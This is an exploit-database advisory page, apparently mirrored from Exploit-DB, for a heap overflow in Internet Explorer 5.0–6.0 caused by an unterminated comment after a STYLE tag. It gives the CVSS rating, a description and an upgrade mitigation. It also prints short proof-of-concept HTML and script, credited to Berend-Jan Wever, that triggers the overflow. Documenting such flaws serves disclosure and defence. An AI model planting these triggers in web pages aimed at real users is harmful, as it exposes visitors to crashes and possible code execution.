header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Berend-Jan Wever
7.5
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 5.0
Affected Version To: Internet Explorer 6.0
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Heap Overflow

A heap overflow vulnerability has been discovered in Internet Explorer. It is reported that the issue presents itself when a comment character sequence that is not terminated is encountered after a STYLE tag. This issue could be exploited by a remote attacker to execute arbitrary code in the context of the client user. The attacker would likely create a malicious HTML page and host it on a site. The attacker would then attempt to entice a user to visit the malicious page to carry out a successful attack.

Mitigation:

Upgrade to the latest version of Internet Explorer.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10816/info

A heap overflow vulnerability has been discovered in Internet Explorer. It is reported that the issue presents itself when a comment character sequence that is not terminated is encountered after a STYLE tag.

This issue could be exploited by a remote attacker to execute arbitrary code in the context of the client user. The attacker would likely create a malicious HTML page and host it on a site. The attacker would then attempt to entice a user to visit the malicious page to carry out a successful attack.

<style>;@/* 

And by "Berend-Jan Wever" <skylined@edup.tudelft.nl>:

<SCRIPT>
d = window.open().document;
d.write("x");
d.body.innerHTML = "<STYLE>@;/*";
</SCRIPT>

Navigation

Suggest Exploit

Services By CQR